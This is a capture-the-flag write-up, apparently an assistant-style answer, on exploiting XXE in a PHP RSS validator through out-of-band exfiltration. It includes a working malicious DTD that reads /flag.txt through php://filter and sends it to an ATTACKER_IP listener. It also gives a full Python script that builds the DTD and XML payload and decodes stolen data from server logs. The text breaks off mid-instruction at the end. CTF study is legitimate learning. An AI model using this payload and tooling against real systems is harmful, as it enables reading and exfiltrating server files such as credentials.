Here is my advice:

Description: Use the RSS Validator to verify your feed. The system is extremely secure... unless you know how to talk to it.

Vulnerability Analysis

The application is a PHP-based RSS Validator that accepts XML input. It explicitly enables external entity loading (libxml_disable_entity_loader(false)) and entity substitution (LIBXML_NOENT).

This makes it vulnerable to XML External Entity (XXE) injection. Since the validator's response never echoes the parsed content, in-band retrieval is not possible, so we use Out-of-Band (OOB) exfiltration: a parameter entity makes the target's parser fetch a URL on our server with the file content embedded in it.

Exploitation Steps (HTTP OOB)

Since the application is running PHP, we can use the powerful php://filter wrapper to Base64 encode the flag before exfiltration. The file content is substituted into the SYSTEM literal of another entity declaration, so any newline, quote, < or & in it would make the DTD malformed (or the URL invalid) and the request would never be sent. Base64 turns the content into a single line drawn from A-Z, a-z, 0-9, +, / and =, which is safe to embed in both the declaration and the query string.

1. Prerequisite: Publicly Accessible Server

You need a server that the challenge container can reach. Let's assume your attacker URL is: http://ATTACKER_IP:8000

2. Create the Malicious DTD (evil.dtd)

Create evil.dtd on your attacker server. The nested declarations have to live in an external DTD because libxml rejects parameter-entity references inside markup declarations in the internal subset. Notice the use of php://filter:

<!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=file:///flag.txt">
<!ENTITY % eval "<!ENTITY &#x25; exfiltrate SYSTEM 'http://ATTACKER_IP:8000/?data=%file;'>">
%eval;
%exfiltrate;

Explanation:

  1. %file reads /flag.txt but runs it through the base64-encode filter first (file:///flag.txt is the resource, php://filter is the wrapper).
  2. %eval declares the %exfiltrate entity that requests your server with ?data=BASE64_CONTENT. The % is written as &#x25; because a literal % inside the entity value would be expanded while the eval declaration itself is being parsed; the character reference is resolved only when %eval; is later substituted.
  3. This is safe for HTTP because the Base64 alphabet contains no whitespace, quotes or XML metacharacters, so the generated declaration stays well-formed and the URL valid. One caveat: if your listener URL-decodes the query string, the + characters become spaces, so restore them before decoding.
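As an added example that is not part of the original writeup, the following Python script generates the two files the procedure needs (evil.dtd and the XML document to submit) from an attacker URL, and decodes the flag back out of the access-log line that a plain python3 -m http.server listener prints when the target makes the callback. ATTACKER_IP, the port, the flag value and the log lines are constructed placeholders; the submitted XML is a minimal RSS document whose DOCTYPE only pulls in the hosted DTD.

```python
import base64
import re
from typing import List, Optional
from urllib.parse import parse_qs, urlsplit

# Constructed placeholder: replace with the listener the challenge container can reach.
ATTACKER_URL = "http://ATTACKER_IP:8000"


def build_evil_dtd(attacker_url: str, target_path: str = "/flag.txt") -> str:
    """Return the external DTD to host as evil.dtd.

    %file reads target_path through PHP's base64-encode filter, %eval declares
    %exfiltrate (written as &#x25; so the % is not expanded while %eval itself
    is parsed), and the two trailing references trigger the outbound request.
    """
    return (
        '<!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode'
        f'/resource=file://{target_path}">\n'
        '<!ENTITY % eval "<!ENTITY &#x25; exfiltrate SYSTEM '
        f"'{attacker_url}/?data=%file;'\">\n"
        "%eval;\n"
        "%exfiltrate;\n"
    )


def build_xml_payload(attacker_url: str, dtd_name: str = "evil.dtd") -> str:
    """Return the document submitted to the validator.

    The internal subset only declares one parameter entity pointing at the
    hosted DTD and references it; the nested declarations cannot go here
    because libxml rejects parameter-entity references inside markup
    declarations of the internal subset.
    """
    return (
        '<?xml version="1.0"?>\n'
        f'<!DOCTYPE rss [<!ENTITY % dtd SYSTEM "{attacker_url}/{dtd_name}"> %dtd;]>\n'
        '<rss version="2.0"><channel><title>x</title></channel></rss>\n'
    )


# Matches the request line inside a python3 -m http.server access-log entry.
REQUEST_LINE = re.compile(r'"GET (?P<target>\S+) HTTP/1\.[01]"')


def decode_exfil(log_line: str) -> Optional[str]:
    """Recover the exfiltrated file from one access-log line.

    Returns None for lines without a data parameter (e.g. the evil.dtd fetch).
    parse_qs form-decodes the query, which turns Base64 '+' into a space, so
    '+' is restored; '=' padding is re-added in case the target stripped it.
    """
    m = REQUEST_LINE.search(log_line)
    if not m:
        return None
    query = urlsplit(m.group("target")).query
    data = parse_qs(query, keep_blank_values=True).get("data")
    if not data:
        return None
    b64 = data[0].replace(" ", "+")
    b64 += "=" * (-len(b64) % 4)
    return base64.b64decode(b64).decode("utf-8", errors="replace")


def recover_from_log(lines: List[str]) -> List[str]:
    """Decode every callback in a listener log, skipping non-exfil requests."""
    return [flag for flag in (decode_exfil(line) for line in lines) if flag is not None]


# Constructed sample log: the DTD fetch followed by the callback carrying
# base64("flag{xxe}\n"). Real lines from the listener look the same.
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Jan/2024 12:00:00] "GET /evil.dtd HTTP/1.0" 200 -',
    '10.0.0.5 - - [01/Jan/2024 12:00:01] "GET /?data=ZmxhZ3t4eGV9Cg== HTTP/1.0" 200 -',
]

if __name__ == "__main__":
    with open("evil.dtd", "w") as fh:
        fh.write(build_evil_dtd(ATTACKER_URL))
    with open("payload.xml", "w") as fh:
        fh.write(build_xml_payload(ATTACKER_URL))
    for flag in recover_from_log(SAMPLE_LOG):
        print(flag, end="")
```

Run it once to write evil.dtd and payload.xml, serve the directory with python3 -m http.server 8000, submit payload.xml to the validator, then paste the listener's log lines into recover_from_log. The decoder tolerates both a raw query string and one that the listener has already URL-decoded.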

Host the malicious external .dtd file on your Kali Linux attacker machine: